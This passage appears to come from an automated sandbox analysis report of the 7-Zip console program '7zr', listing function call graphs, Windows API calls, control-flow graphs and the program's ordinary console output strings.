6ff1e6 77092->76859 77093 6ff1d3 77093->77092 77094 6ff21c _CxxThrowException 77093->77094 77095 6ff231 memcpy 77093->77095 77094->77095 77098 6ff24c 77095->77098 77096 6ff2f0 memmove 77096->77098 77097 6ff31a memcpy 77097->77092 77098->77092 77098->77096 77098->77097 77100 6c111c 10 API calls 77099->77100 77101 6c117b 77100->77101 77101->77093 77103 70151b __EH_prolog 77102->77103 77109 7010d3 77103->77109 77106 701552 _CxxThrowException 77106->76865 77107 701589 77107->76865 77108->76867 77110 7010dd __EH_prolog 77109->77110 77111 6fd1b7 free 77110->77111 77112 7010f2 77111->77112 77113 7012ef 77112->77113 77114 7011f4 77112->77114 77118 6c1168 10 API calls 77112->77118 77113->77106 77113->77107 77114->77113 77140 6bb95a 6 API calls 77114->77140 77115 70139e 77115->77113 77116 7013c4 77115->77116 77119 6b1e0c ctype 2 API calls 77115->77119 77117 6c1168 10 API calls 77116->77117 77121 7013da 77117->77121 77118->77114 77119->77116 77120 7013de 77182 6b1e40 free 77120->77182 77121->77120 77124 7013f9 77121->77124 77176 6fef67 _CxxThrowException 77121->77176 77141 6ff047 77124->77141 77127 7014ba 77180 700943 50 API calls 2 library calls 77127->77180 77128 701450 77145 7006ae 77128->77145 77132 7014e7 77181 6e2db9 free ctype 77132->77181 77136 70148e 77137 6ff047 _CxxThrowException 77136->77137 77138 7014ac 77137->77138 77138->77127 77179 6fef67 _CxxThrowException 77138->77179 77140->77115 77142 6ff063 77141->77142 77143 6ff072 77142->77143 77183 6fef67 _CxxThrowException 77142->77183 77143->77127 77143->77128 77177 6fef67 _CxxThrowException 77143->77177 77146 7006b8 __EH_prolog 77145->77146 77184 7003f4 77146->77184 77148 700877 77150 6fb8dc ctype free 77148->77150 77149 6c12a5 5 API calls 77175 700715 77149->77175 77151 7008a6 77150->77151 77214 6b1e40 free 77151->77214 77152 7008e3 _CxxThrowException 77154 7008f7 77152->77154 77158 6fb8dc ctype free 77154->77158 77155 7008ae 77215 6b1e40 free 77155->77215 77156 6b429a 3 API calls 77156->77175 77160 700914 77158->77160 77159 7008b6 77216 6b1e40 free 77159->77216 77218 6b1e40 free 77160->77218 77161 6b1e0c ctype 2 API calls 77161->77175 77164 7008be 77217 6fc149 free ctype 77164->77217 77165 70091c 77219 6b1e40 free 77165->77219 77167 7008d0 77167->77132 77167->77136 77178 6fef67 _CxxThrowException 77167->77178 77169 700924 77220 6b1e40 free 77169->77220 77170 6f81ec 29 API calls 77170->77175 77172 70092c 77221 6fc149 free ctype 77172->77221 77174 6fef67 _CxxThrowException 77174->77175 77175->77148 77175->77149 77175->77152 77175->77154 77175->77156 77175->77161 77175->77170 77175->77174 77176->77124 77177->77128 77178->77136 77179->77127 77180->77132 77181->77120 77182->77113 77183->77143 77185 6ff047 _CxxThrowException 77184->77185 77186 700407 77185->77186 77187 6ff047 _CxxThrowException 77186->77187 77188 700475 77186->77188 77190 700421 77187->77190 77192 70049a 77188->77192 77225 6ffa3f 22 API calls 2 library calls 77188->77225 77189 7004e8 77228 707c4a malloc _CxxThrowException free ctype 77189->77228 77194 70043e 77190->77194 77222 6fef67 _CxxThrowException 77190->77222 77201 7004b8 77192->77201 77226 70159a malloc _CxxThrowException free ctype 77192->77226 77193 7004cd 77227 6ffff0 9 API calls 2 library calls 77193->77227 77223 6ff93c 7 API calls 2 library calls 77194->77223 77196 700492 77199 6ff047 _CxxThrowException 77196->77199 77199->77192 77201->77189 77201->77193 77202 7004db 77206 6ff047 _CxxThrowException 77202->77206 77204 7004e3 77208 70054a 77204->77208 77230 6fef67 _CxxThrowException 77204->77230 77205 700446 77207 70046d 77205->77207 77224 6fef67 _CxxThrowException 77205->77224 77206->77204 77209 6ff047 _CxxThrowException 77207->77209 77208->77175 77209->77188 77211 7004f3 77211->77204 77229 6c089e malloc _CxxThrowException free _CxxThrowException memcpy 77211->77229 77214->77155 77215->77159 77216->77164 77217->77167 77218->77165 77219->77169 77220->77172 77221->77167 77222->77194 77223->77205 77224->77207 77225->77196 77226->77201 77227->77202 77228->77211 77229->77211 77230->77208 77231 6f0343 77236 6f035f 77231->77236 77235 6f0358 77237 6f0369 __EH_prolog 77236->77237 77253 6c139e 77237->77253 77242 6f0143 ctype free 77243 6f039a 77242->77243 77263 6b1e40 free 77243->77263 77245 6f03a2 77264 6b1e40 free 77245->77264 77247 6f03aa 77265 6f03d8 77247->77265 77252 6b1e40 free 77252->77235 77254 6c13ae 77253->77254 77255 6c13b3 77253->77255 77281 747ea0 SetEvent GetLastError 77254->77281 77257 6f01c4 77255->77257 77262 6f01ce __EH_prolog 77257->77262 77258 6f0203 77282 6b1e40 free 77258->77282 77260 6f020b 77260->77242 77262->77258 77283 6b1e40 free 77262->77283 77263->77245 77264->77247 77266 6f03e2 __EH_prolog 77265->77266 77267 6c139e ctype 2 API calls 77266->77267 77268 6f03fb 77267->77268 77284 747d50 77268->77284 77270 6f0403 77271 747d50 ctype 2 API calls 77270->77271 77272 6f040b 77271->77272 77273 747d50 ctype 2 API calls 77272->77273 77274 6f03b7 77273->77274 77275 6f004a 77274->77275 77276 6f0054 __EH_prolog 77275->77276 77290 6b1e40 free 77276->77290 77278 6f0067 77291 6b1e40 free 77278->77291 77280 6f006f 77280->77235 77280->77252 77281->77255 77282->77260 77283->77262 77285 747d59 CloseHandle 77284->77285 77286 747d7b 77284->77286 77287 747d64 GetLastError 77285->77287 77288 747d75 77285->77288 77286->77270 77287->77286 77289 747d6e 77287->77289 77288->77286 77289->77270 77290->77278 77291->77280 77292 6bb144 77293 6bb153 77292->77293 77295 6bb159 77292->77295 77294 6c11b4 107 API calls 77293->77294 77294->77295 77296 6dd3c2 77297 6dd3e9 77296->77297 77298 6b965d VariantClear 77297->77298 77299 6dd42a 77298->77299 77300 6dd883 2 API calls 77299->77300 77301 6dd4b1 77300->77301 77387 6d8d4a 77301->77387 77304 6d8b05 VariantClear 77306 6dd4e3 77304->77306 77305 6d2a72 2 API calls 77307 6dd54c 77305->77307 77306->77305 77308 6b2fec 3 API calls 77307->77308 77309 6dd594 77308->77309 77310 6dd5cd 77309->77310 77311 6dd742 77309->77311 77312 6dd7d9 77310->77312 77404 6d9317 77310->77404 77419 6dcd49 malloc _CxxThrowException free 77311->77419 77422 6b1e40 free 77312->77422 77315 6dd754 77318 6b2fec 3 API calls 77315->77318 77322 6dd763 77318->77322 77319 6dd7e1 77423 6b1e40 free 77319->77423 77321 6dd5f1 77324 6f04d2 5 API calls 77321->77324 77420 6b1e40 free 77322->77420 77323 6dd7e9 77326 6d326b free 77323->77326 77327 6dd5f9 77324->77327 77338 6dd69a 77326->77338 77410 6de332 77327->77410 77328 6dd76b 77421 6b1e40 free 77328->77421 77331 6dd773 77333 6d326b free 77331->77333 77333->77338 77335 6dd610 77417 6b1e40 free 77335->77417 77337 6dd618 77339 6d326b free 77337->77339 77340 6dd2a8 77339->77340 77340->77338 77362 6dd883 77340->77362 77343 6b2fec 3 API calls 77344 6dd361 77343->77344 77345 6b2fec 3 API calls 77344->77345 77346 6dd36d 77345->77346 77374 6dd0e1 77346->77374 77348 6dd380 77349 6dd38a 77348->77349 77350 6dd665 77348->77350 77351 6f04d2 5 API calls 77349->77351 77352 6dd68b 77350->77352 77418 6dcd49 malloc _CxxThrowException free 77350->77418 77353 6dd392 77351->77353 77355 6d326b free 77352->77355 77356 6de332 2 API calls 77353->77356 77355->77338 77358 6dd3a1 77356->77358 77357 6dd67c 77359 6b2fec 3 API calls 77357->77359 77360 6d326b free 77358->77360 77359->77352 77361 6dd3b0 77360->77361 77363 6dd88d __EH_prolog 77362->77363 77364 6b2e04 2 API calls 77363->77364 77365 6dd8c6 77364->77365 77366 6b2e04 2 API calls 77365->77366 77367 6dd8d2 77366->77367 77368 6b2e04 2 API calls 77367->77368 77369 6dd8de 77368->77369 77370 6d2b63 2 API calls 77369->77370 77371 6dd8fa 77370->77371 77372 6d2b63 2 API calls 77371->77372 77373 6dd34f 77372->77373 77373->77343 77375 6dd0eb __EH_prolog 77374->77375 77376 6dd138 77375->77376 77377 6dd10b 77375->77377 77379 6b1e0c ctype 2 API calls 77376->77379 77380 6dd112 77376->77380 77378 6b1e0c ctype 2 API calls 77377->77378 77378->77380 77381 6dd14b 77379->77381 77380->77348 77382 6b2fec 3 API calls 77381->77382 77383 6dd17b 77382->77383 77424 6b7b41 28 API calls 77383->77424 77385 6dd18a 77385->77380 77425 6b757d GetLastError 77385->77425 77388 6d8d54 __EH_prolog 77387->77388 77402 6d8da4 77388->77402 77426 6b2b55 malloc _CxxThrowException free _CxxThrowException ctype 77388->77426 77389 6d8e09 77391 6b965d VariantClear 77389->77391 77390 6d8e15 77392 6d8e2d 77390->77392 77394 6d8e5e 77390->77394 77395 6d8e21 77390->77395 77393 6d8e11 77391->77393 77392->77394 77396 6d8e2b 77392->77396 77393->77304 77397 6b965d VariantClear 77394->77397 77427 6b3097 malloc _CxxThrowException free SysStringLen ctype 77395->77427 77399 6b965d VariantClear 77396->77399 77397->77393 77401 6d8e47 77399->77401 77401->77393 77428 6d8e7c 6 API calls __EH_prolog 77401->77428 77402->77389 77402->77390 77402->77393 77407 6d9321 __EH_prolog 77404->77407 77405 6b965d VariantClear 77406 6d93d0 77405->77406 77406->77312 77406->77321 77409 6d9360 77407->77409 77429 6b9686 VariantClear 77407->77429 77409->77405 77411 6de33c __EH_prolog 77410->77411 77412 6b1e0c ctype 2 API calls 77411->77412 77413 6de34a 77412->77413 77414 6dd608 77413->77414 77430 6de3d1 malloc _CxxThrowException __EH_prolog 77413->77430 77416 6b1e40 free 77414->77416 77416->77335 77417->77337 77418->77357 77419->77315 77420->77328 77421->77331 77422->77319 77423->77323 77424->77385 77425->77380 77426->77402 77427->77396 77428->77393 77429->77409 77430->77414 77431 6c1ade 77432 6c1ae8 __EH_prolog 77431->77432 77482 6b13f5 77432->77482 77435 6c1b32 6 API calls 77437 6c1b8d 77435->77437 77446 6c1bf8 77437->77446 77500 6c1ea4 9 API calls 77437->77500 77438 6c1b24 _CxxThrowException 77438->77435 77440 6c1bdf 77441 6b27bb 3 API calls 77440->77441 77442 6c1bec 77441->77442 77501 6b1e40 free 77442->77501 77444 6c1c89 77496 6c1eb9 77444->77496 77446->77444 77502 6d1d73 5 API calls __EH_prolog 77446->77502 77449 6c1cb2 _CxxThrowException 77449->77444 77483 6b13ff __EH_prolog 77482->77483 77484 6d7ebb free 77483->77484 77485 6b142b 77484->77485 77486 6b1438 77485->77486 77503 6b1212 free ctype 77485->77503 77488 6b1e0c ctype 2 API calls 77486->77488 77491 6b144d 77488->77491 77489 6b14f4 77489->77435 77499 6d1d73 5 API calls __EH_prolog 77489->77499 77490 6f04d2 5 API calls 77490->77491 77491->77489 77491->77490 77494 6b1507 77491->77494 77504 6b1265 5 API calls 2 library calls 77491->77504 77505 6b1524 malloc _CxxThrowException __EH_prolog ctype 77491->77505 77495 6b2fec 3 API calls 77494->77495 77495->77489 77506 6b9313 GetCurrentProcess OpenProcessToken 77496->77506 77499->77438 77500->77440 77501->77446 77502->77449 77503->77486 77504->77491 77505->77491 77507 6b933a LookupPrivilegeValueW 77506->77507 77508 6b9390 77506->77508 77509 6b934c AdjustTokenPrivileges 77507->77509 77510 6b9382 77507->77510 77509->77510 77512 6b9372 GetLastError 77509->77512 77511 6b9385 CloseHandle 77510->77511 77511->77508 77512->77511 77513 6bb5d9 77514 6bb5f7 77513->77514 77515 6bb5e6 77513->77515 77515->77514 77519 6bb5fe 77515->77519 77520 6bb608 __EH_prolog 77519->77520 77526 736a40 VirtualFree 77520->77526 77522 6bb63d 77523 6b764c CloseHandle 77522->77523 77524 6bb5f1 77523->77524 77525 6b1e40 free 77524->77525 77525->77514 77526->77522 77527 6c459e 77528 6c45ab 77527->77528 77529 6c45bc 77527->77529 77528->77529 77533 6c45c3 77528->77533 77534 6c45cd __EH_prolog 77533->77534 77562 6c79b2 free ctype 77534->77562 77536 6c45e8 77563 6b1e40 free 77536->77563 77538 6c45f3 77564 6e2db9 free ctype 77538->77564 77540 6c4609 77565 6b1e40 free 77540->77565 77542 6c4610 77566 6b1e40 free 77542->77566 77544 6c461b 77567 6b1e40 free 77544->77567 77546 6c4626 77568 6c794c free ctype 77546->77568 77548 6c4638 77569 6e2db9 free ctype 77548->77569 77550 6c465b 77570 6b1e40 free 77550->77570 77552 6c468e 77571 6b1e40 free 77552->77571 77554 6c46ae 77572 6c4733 free __EH_prolog ctype 77554->77572 77556 6c46be 77573 6b1e40 free 77556->77573 77558 6c46e8 77574 6b1e40 free 77558->77574 77560 6c45b6 77561 6b1e40 free 77560->77561 77561->77529 77562->77536 77563->77538 77564->77540 77565->77542 77566->77544 77567->77546 77568->77548 77569->77550 77570->77552 77571->77554 77572->77556 77573->77558 77574->77560 77575 736bc6 77576 736bca 77575->77576 77577 736bcd 77575->77577 77577->77576 77578 736bd1 malloc 77577->77578 77578->77576 77579 6b42d1 77580 6b42bd 77579->77580 77581 6b42c5 77580->77581 77582 6b1e0c ctype 2 API calls 77580->77582 77582->77581 77583 6eacd3 77584 6eacf1 77583->77584 77585 6eace0 77583->77585 77585->77584 77589 6eacf8 77585->77589 77590 6ec0b3 __EH_prolog 77589->77590 77593 6d7193 free 77590->77593 77594 6ec0ed 77590->77594 77597 6b1e40 free 77590->77597 77592 6eaceb 77596 6b1e40 free 77592->77596 77593->77590 77598 6b1e40 free 77594->77598 77596->77584 77597->77590 77598->77592

                              Executed Functions

                              Function 006F81EC Relevance: 8.0, APIs: 3, Strings: 1, Instructions: 995COMMON
                              Download Yara Rule
                              APIs
                              • __EH_prolog.LIBCMT ref: 006F81F1
                                • Part of subcall function 006FF749: _CxxThrowException.MSVCRT(?,00764A58), ref: 006FF792
                              Strings
                              Memory Dump Source
                              • Source File: 00000009.00000002.1801463258.00000000006B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006B0000, based on PE: true
                              • Associated: 00000009.00000002.1801445433.00000000006B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 00000009.00000002.1801520747.000000000075C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 00000009.00000002.1801543795.0000000000772000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 00000009.00000002.1801561855.000000000077B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_6b0000_7zr.jbxd
                              Similarity
                              • API ID: ExceptionH_prologThrow
                              • String ID:
                              • API String ID: 461045715-3916222277
                              • Opcode ID: 8b65da886f3ac493fc931a174eb2f5c1e601720bd516134bbe1547a42d7c4615
                              • Instruction ID: 0b99f4b2d359d0391d1f26779bc4da496751d1bda0f25179f7c12956af61ff2c
                              • Opcode Fuzzy Hash: 8b65da886f3ac493fc931a174eb2f5c1e601720bd516134bbe1547a42d7c4615
                              • Instruction Fuzzy Hash: 32928B31900249DFDB15DFA8C854BEEBBB2BF09304F244099E915AB392CB75AE45CB61
                              Function 006EA013 Relevance: 60.2, APIs: 15, Strings: 19, Instructions: 690COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 0 6ea013-6ea01a 1 6ea37a-6ea544 call 6f04d2 call 6b1524 call 6f04d2 call 6b1524 call 6b1e0c 0->1 2 6ea020-6ea02d call 6c1ac8 0->2 61 6ea546-6ea54f call 6eb0fa 1->61 62 6ea551 1->62 8 6ea22e-6ea235 2->8 9 6ea033-6ea03a 2->9 10 6ea23b-6ea24d call 6eb4f6 8->10 11 6ea367-6ea375 call 6eb55f 8->11 13 6ea03c-6ea042 9->13 14 6ea054-6ea089 call 6e92d3 9->14 28 6ea24f-6ea253 10->28 29 6ea259-6ea2fb call 6d7ebb call 6b27bb call 6b26dd call 6d3d70 call 6ead99 call 6b27bb 10->29 27 6eac23-6eac2a 11->27 13->14 18 6ea044-6ea04f call 6b30ea 13->18 25 6ea08b-6ea091 14->25 26 6ea099 14->26 18->14 25->26 31 6ea093-6ea097 25->31 32 6ea09d-6ea0de call 6b2fec call 6eb369 26->32 33 6eac2c-6eac33 27->33 34 6eac3a-6eac66 call 6eb96d call 6b1e40 call 6d3247 27->34 28->29 94 6ea2fd 29->94 95 6ea303-6ea362 call 6eb6ab call 6e2db9 call 6b1e40 * 2 call 6ebff8 29->95 31->32 57 6ea0ea-6ea0fa 32->57 58 6ea0e0-6ea0e4 32->58 33->34 39 6eac35 33->39 71 6eac6e-6eacb5 call 6b1e40 call 6b11c2 call 6ebe0c call 6e2db9 34->71 72 6eac68-6eac6a 34->72 44 6eac35 call 6eb988 39->44 44->34 63 6ea0fc-6ea102 57->63 64 6ea10d 57->64 58->57 68 6ea553-6ea55c 61->68 62->68 63->64 69 6ea104-6ea10b 63->69 70 6ea114-6ea19e call 6b2fec call 6d7ebb call 6ead99 64->70 76 6ea55e-6ea560 68->76 77 6ea564-6ea5c1 call 6b2fec call 6eb277 68->77 69->70 102 6ea1a2 call 6df8e0 70->102 72->71 76->77 96 6ea5cd-6ea652 call 6ead06 call 6ebf3e call 6c3a29 call 6b2e04 call 6d4345 77->96 97 6ea5c3-6ea5c7 77->97 94->95 95->27 137 6ea676-6ea6c8 call 6d2096 96->137 138 6ea654-6ea671 call 6d375c call 6eb96d 96->138 97->96 106 6ea1a7-6ea1b1 102->106 110 6ea1b3-6ea1bb call 6ec7d7 106->110 111 6ea1c0-6ea1c9 106->111 110->111 116 6ea1cb 111->116 117 6ea1d1-6ea229 call 6eb6ab call 6e2db9 call 6b1e40 call 6ebfa4 call 6e940b 111->117 116->117 117->27 142 6ea6cd-6ea6d6 137->142 138->137 146 6ea6d8-6ea6dd call 6ec7d7 142->146 147 6ea6e2-6ea6e5 142->147 146->147 150 6ea72e-6ea73a 147->150 151 6ea6e7-6ea6ee 147->151 152 6ea79e-6ea7aa 150->152 153 6ea73c-6ea74a call 6b1fa0 150->153 154 6ea722-6ea725 151->154 155 6ea6f0-6ea71d call 6b1fa0 fputs call 6b1fa0 call 6b1fb3 call 6b1fa0 151->155 156 6ea7ac-6ea7b2 152->156 157 6ea7d9-6ea7e5 152->157 167 6ea74c-6ea753 153->167 168 6ea755-6ea799 fputs call 6b2201 call 6b1fa0 fputs call 6b2201 call 6b1fa0 153->168 154->150 158 6ea727 154->158 155->154 156->157 161 6ea7b4-6ea7d4 fputs call 6b2201 call 6b1fa0 156->161 163 6ea818-6ea81a 157->163 164 6ea7e7-6ea7ed 157->164 158->150 161->157 169 6ea899-6ea8a5 163->169 172 6ea81c-6ea82b 163->172 164->169 170 6ea7f3-6ea813 fputs call 6b2201 call 6b1fa0 164->170 167->152 167->168 168->152 176 6ea8e9-6ea8ed 169->176 177 6ea8a7-6ea8ad 169->177 170->163 179 6ea82d-6ea84c fputs call 6b2201 call 6b1fa0 172->179 180 6ea851-6ea85d 172->180 182 6ea8ef 176->182 183 6ea8f6-6ea8f8 176->183 177->182 187 6ea8af-6ea8c2 call 6b1fa0 177->187 179->180 180->169 181 6ea85f-6ea872 call 6b1fa0 180->181 181->169 206 6ea874-6ea894 fputs call 6b2201 call 6b1fa0 181->206 182->183 191 6ea8fe-6ea90a 183->191 192 6eaaaf-6eaaeb call 6d43b3 call 6b1e40 call 6ec104 call 6ead82 183->192 187->182 211 6ea8c4-6ea8e4 fputs call 6b2201 call 6b1fa0 187->211 201 6eaa73-6eaa89 call 6b1fa0 191->201 202 6ea910-6ea91f 191->202 248 6eac0b-6eac1e call 6e2db9 * 2 192->248 249 6eaaf1-6eaaf7 192->249 201->192 218 6eaa8b-6eaaaa fputs call 6b2201 call 6b1fa0 201->218 202->201 208 6ea925-6ea929 202->208 206->169 208->192 214 6ea92f-6ea93d 208->214 211->176 222 6ea93f-6ea964 fputs call 6b2201 call 6b1fa0 214->222 223 6ea96a-6ea971 214->223 218->192 222->223 230 6ea98f-6ea9a8 fputs call 6b2201 223->230 231 6ea973-6ea97a 223->231 239 6ea9ad-6ea9bd call 6b1fa0 230->239 231->230 232 6ea97c-6ea982 231->232 232->230 237 6ea984-6ea98d 232->237 237->230 242 6eaa06-6eaa1f fputs call 6b2201 237->242 239->242 252 6ea9bf-6eaa01 fputs call 6b2201 call 6b1fa0 fputs call 6b2201 call 6b1fa0 239->252 250 6eaa24-6eaa29 call 6b1fa0 242->250 248->27 249->248 257 6eaa2e-6eaa4b fputs call 6b2201 250->257 252->242 262 6eaa50-6eaa5b call 6b1fa0 257->262 262->192 268 6eaa5d-6eaa71 call 6b1fa0 call 6e710e 262->268 268->192
                              Strings
                              Memory Dump Source
                              • Source File: 00000009.00000002.1801463258.00000000006B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006B0000, based on PE: true
                              • Associated: 00000009.00000002.1801445433.00000000006B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 00000009.00000002.1801520747.000000000075C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 00000009.00000002.1801543795.0000000000772000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 00000009.00000002.1801561855.000000000077B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_6b0000_7zr.jbxd
                              Similarity
                              • API ID: fputs$ExceptionThrow
                              • String ID: 7zCon.sfx$Alternate Streams Size: $Alternate Streams: $Archives with Errors: $Archives with Warnings: $Archives: $Can't open as archive: $Compressed: $ERROR:$Files: $Folders: $OK archives: $Open Errors: $Size: $Sub items Errors: $Warnings: $`&w$p&w$N
                              • API String ID: 3665150552-3419150154
                              • Opcode ID: adfa83e990af3acfa36323dedf162b5efb8eb185dc9a03e99ca7ea345865d5a6
                              • Instruction ID: 75f44dcf27e530c853795207e1d29efa79defc371baba3f1dda42645ce7e288f
                              • Opcode Fuzzy Hash: adfa83e990af3acfa36323dedf162b5efb8eb185dc9a03e99ca7ea345865d5a6
                              • Instruction Fuzzy Hash: 59529C70901298DFCF66DBA5C895BEEBBF6AF44300F14409EE44AA7291DB346E84CF15
                              Function 006EA42C Relevance: 60.0, APIs: 15, Strings: 19, Instructions: 503COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 274 6ea42c-6ea433 275 6ea449-6ea4df call 6e545d call 6b2e04 call 6d1858 call 6b1e40 274->275 276 6ea435-6ea444 fputs call 6b1fa0 274->276 286 6ea4ee-6ea4f1 275->286 287 6ea4e1-6ea4e9 call 6ec7d7 275->287 276->275 289 6ea50e-6ea520 call 6ec73e 286->289 290 6ea4f3-6ea4fa 286->290 287->286 295 6eac0b-6eac2a call 6e2db9 * 2 289->295 296 6ea526-6ea544 call 6b1e0c 289->296 290->289 291 6ea4fc-6ea509 call 6e57fb 290->291 291->289 306 6eac2c-6eac33 295->306 307 6eac3a-6eac66 call 6eb96d call 6b1e40 call 6d3247 295->307 304 6ea546-6ea54f call 6eb0fa 296->304 305 6ea551 296->305 309 6ea553-6ea55c 304->309 305->309 306->307 310 6eac35 call 6eb988 306->310 328 6eac6e-6eacb5 call 6b1e40 call 6b11c2 call 6ebe0c call 6e2db9 307->328 329 6eac68-6eac6a 307->329 313 6ea55e-6ea560 309->313 314 6ea564-6ea5c1 call 6b2fec call 6eb277 309->314 310->307 313->314 324 6ea5cd-6ea652 call 6ead06 call 6ebf3e call 6c3a29 call 6b2e04 call 6d4345 314->324 325 6ea5c3-6ea5c7 314->325 348 6ea676-6ea6d6 call 6d2096 324->348 349 6ea654-6ea671 call 6d375c call 6eb96d 324->349 325->324 329->328 355 6ea6d8-6ea6dd call 6ec7d7 348->355 356 6ea6e2-6ea6e5 348->356 349->348 355->356 358 6ea72e-6ea73a 356->358 359 6ea6e7-6ea6ee 356->359 360 6ea79e-6ea7aa 358->360 361 6ea73c-6ea74a call 6b1fa0 358->361 362 6ea722-6ea725 359->362 363 6ea6f0-6ea71d call 6b1fa0 fputs call 6b1fa0 call 6b1fb3 call 6b1fa0 359->363 364 6ea7ac-6ea7b2 360->364 365 6ea7d9-6ea7e5 360->365 375 6ea74c-6ea753 361->375 376 6ea755-6ea799 fputs call 6b2201 call 6b1fa0 fputs call 6b2201 call 6b1fa0 361->376 362->358 366 6ea727 362->366 363->362 364->365 369 6ea7b4-6ea7d4 fputs call 6b2201 call 6b1fa0 364->369 371 6ea818-6ea81a 365->371 372 6ea7e7-6ea7ed 365->372 366->358 369->365 377 6ea899-6ea8a5 371->377 380 6ea81c-6ea82b 371->380 372->377 378 6ea7f3-6ea813 fputs call 6b2201 call 6b1fa0 372->378 375->360 375->376 376->360 384 6ea8e9-6ea8ed 377->384 385 6ea8a7-6ea8ad 377->385 378->371 387 6ea82d-6ea84c fputs call 6b2201 call 6b1fa0 380->387 388 6ea851-6ea85d 380->388 390 6ea8ef 384->390 391 6ea8f6-6ea8f8 384->391 385->390 395 6ea8af-6ea8c2 call 6b1fa0 385->395 387->388 388->377 389 6ea85f-6ea872 call 6b1fa0 388->389 389->377 414 6ea874-6ea894 fputs call 6b2201 call 6b1fa0 389->414 390->391 399 6ea8fe-6ea90a 391->399 400 6eaaaf-6eaaeb call 6d43b3 call 6b1e40 call 6ec104 call 6ead82 391->400 395->390 419 6ea8c4-6ea8e4 fputs call 6b2201 call 6b1fa0 395->419 409 6eaa73-6eaa89 call 6b1fa0 399->409 410 6ea910-6ea91f 399->410 400->295 456 6eaaf1-6eaaf7 400->456 409->400 426 6eaa8b-6eaaaa fputs call 6b2201 call 6b1fa0 409->426 410->409 416 6ea925-6ea929 410->416 414->377 416->400 422 6ea92f-6ea93d 416->422 419->384 430 6ea93f-6ea964 fputs call 6b2201 call 6b1fa0 422->430 431 6ea96a-6ea971 422->431 426->400 430->431 438 6ea98f-6ea9a8 fputs call 6b2201 431->438 439 6ea973-6ea97a 431->439 447 6ea9ad-6ea9bd call 6b1fa0 438->447 439->438 440 6ea97c-6ea982 439->440 440->438 445 6ea984-6ea98d 440->445 445->438 450 6eaa06-6eaa4b fputs call 6b2201 call 6b1fa0 fputs call 6b2201 445->450 447->450 458 6ea9bf-6eaa01 fputs call 6b2201 call 6b1fa0 fputs call 6b2201 call 6b1fa0 447->458 466 6eaa50-6eaa5b call 6b1fa0 450->466 456->295 458->450 466->400 472 6eaa5d-6eaa71 call 6b1fa0 call 6e710e 466->472 472->400
                              APIs
                              • fputs.MSVCRT(Scanning the drive for archives:), ref: 006EA43E
                                • Part of subcall function 006B1FA0: fputc.MSVCRT ref: 006B1FA7
                              Strings
                              Memory Dump Source
                              • Source File: 00000009.00000002.1801463258.00000000006B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006B0000, based on PE: true
                              • Associated: 00000009.00000002.1801445433.00000000006B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 00000009.00000002.1801520747.000000000075C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 00000009.00000002.1801543795.0000000000772000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 00000009.00000002.1801561855.000000000077B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_6b0000_7zr.jbxd
                              Similarity
                              • API ID: fputcfputs
                              • String ID: Alternate Streams Size: $Alternate Streams: $Archives with Errors: $Archives with Warnings: $Archives: $Can't open as archive: $Compressed: $ERROR:$Files: $Folders: $OK archives: $Open Errors: $Scanning the drive for archives:$Size: $Warnings: $`&w$p&w$!"$N
                              • API String ID: 269475090-1564544673
                              • Opcode ID: ee82b83acb58a397bd16dcb558836c03355202cfc38c9906973d5de84d805467
                              • Instruction ID: 32d1fbdb6bb92ed8e991a1b4b4a54cb2fbda455cbb2e9f077aea009182e096de
                              • Opcode Fuzzy Hash: ee82b83acb58a397bd16dcb558836c03355202cfc38c9906973d5de84d805467
                              • Instruction Fuzzy Hash: 2B229A709012889FDF66EBA5C895BEDFBF6AF44300F14409EE44AA7291DB346E84CF15
                              Function 006E8012 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 240COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 777 6e8012-6e8032 call 74fb10 780 6e8038-6e806c fputs call 6e8341 777->780 781 6e8285 777->781 785 6e806e-6e8071 780->785 786 6e80c8-6e80cd 780->786 782 6e8287-6e8295 781->782 787 6e808b-6e808d 785->787 788 6e8073-6e8089 fputs call 6b1fa0 785->788 789 6e80cf-6e80d4 786->789 790 6e80d6-6e80df 786->790 793 6e808f-6e8094 787->793 794 6e8096-6e809f 787->794 788->786 791 6e80e2-6e8110 call 6e8341 call 6e8622 789->791 790->791 804 6e811e-6e812f call 6e8565 791->804 805 6e8112-6e8119 call 6e831f 791->805 797 6e80a2-6e80c7 call 6b2e47 call 6e85c6 call 6b1e40 793->797 794->797 797->786 804->782 812 6e8135-6e813f 804->812 805->804 813 6e814d-6e815b 812->813 814 6e8141-6e8148 call 6e82bb 812->814 813->782 817 6e8161-6e8164 813->817 814->813 818 6e81b6-6e81c0 817->818 819 6e8166-6e8186 817->819 820 6e8276-6e827f 818->820 821 6e81c6-6e81e1 fputs 818->821 823 6e818c-6e8196 call 6e8565 819->823 824 6e8298-6e829d 819->824 820->780 820->781 821->820 827 6e81e7-6e81fb 821->827 829 6e819b-6e819d 823->829 828 6e82b1-6e82b9 SysFreeString 824->828 830 6e81fd-6e821f 827->830 831 6e8273 827->831 828->782 829->824 832 6e81a3-6e81b4 SysFreeString 829->832 834 6e829f-6e82a1 830->834 835 6e8221-6e8245 830->835 831->820 832->818 832->819 836 6e82ae 834->836 838 6e8247-6e8271 call 6e84a7 call 6b965d SysFreeString 835->838 839 